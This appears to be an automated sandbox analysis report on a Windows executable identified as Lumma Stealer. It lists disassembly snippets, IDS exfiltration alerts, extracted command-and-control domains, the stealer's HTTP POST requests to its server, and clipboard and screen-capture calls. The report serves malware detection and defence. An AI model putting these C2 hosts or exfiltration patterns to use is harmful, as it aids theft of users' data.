Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	0_2_021051F8
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_021051F8
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then test eax, eax	0_2_02119637
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]	0_2_020E7627
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	0_2_020E7627
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_020F7648
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02115677
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov edx, eax	0_2_0211C6A7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_021036AF
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_021026DE
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	0_2_021206E7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]	0_2_020FC718
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov esi, ecx	0_2_0211C777
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then test eax, eax	0_2_0211C777
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	0_2_0211C777
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov dword ptr [esp], ecx	0_2_020F9769
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]	0_2_0211C417
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0211E401
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh	0_2_020F6417
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]	0_2_020F6417
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]	0_2_020EC494
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0210C4D3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_0210C4D3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]	0_2_0211E4C9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0210C4E9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_0210C4E9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov ecx, eax	0_2_020F456F
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]	0_2_020F8578
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]	0_2_020F8578
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]	0_2_021065C7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	0_2_02103A37
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then jmp ecx	0_2_0211DA7F
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h	0_2_020F9A87
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_020F9A87
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]	0_2_0211EAB7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then jmp ecx	0_2_02102ADD
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h	0_2_02119B07
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_02108BC1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov ecx, eax	0_2_02108BC1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	0_2_020F5842
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C0Fh]	0_2_020F4615
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov esi, edx	0_2_020E88A7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_021078BE
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_020F68FF
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_020F68FF
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx]	0_2_0211E947
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]	0_2_020EC957
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	0_2_020F59A9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	0_2_020F59A9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], dx	0_2_020F49DC
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then push esi	0_2_02100E3A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02106E92
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	0_2_02101EE7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	0_2_020F6EF7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]	0_2_02107F17
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]	0_2_0211DF50
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0211DF50
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov ecx, eax	0_2_020FAFE7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0211FC0A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_020FCCC7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_020FCCC7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]	0_2_02103CC7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_02109CF7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0210BCE0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]	0_2_0211ECE7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_020F8CF0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_020E2DC7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	0_2_0211FDE7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:54613 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49741 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49741 -> 172.67.190.223:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: begguinnerz.biz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49741 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49752 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49758 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:54613 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49768 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:54620 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.190.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49779 -> 172.67.190.223:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R9INL4CZSWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12794Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=967AUNDDDSFT8CW9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FA835ZQW22VQ25YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20556Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=67T0FNQL66S48HE8G72User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1286Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VPWHDOX2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1055Host: begguinnerz.biz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: begguinnerz.biz
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz

Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2278756433.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2317946909.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microh
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: X-mas_2.3.2.exe, 00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/
Source: X-mas_2.3.2.exe, 00000000.00000003.2278756433.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/1
Source: X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/6
Source: X-mas_2.3.2.exe, 00000000.00000003.2317946909.0000000000627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/api
Source: X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/api1
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/api8
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/apiFK
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/apiND
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/d
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/q
Source: X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/api
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54613 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54620
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54613
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779

Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:54613 version: TLS 1.2

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00432D70

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00432D70

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_00432FE0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2578235069.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00421060	0_2_00421060
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00438860	0_2_00438860
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00426000	0_2_00426000
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00419362	0_2_00419362
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043FB80	0_2_0043FB80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043BCE0	0_2_0043BCE0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004384F0	0_2_004384F0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00440480	0_2_00440480
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00418DF1	0_2_00418DF1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004095A0	0_2_004095A0
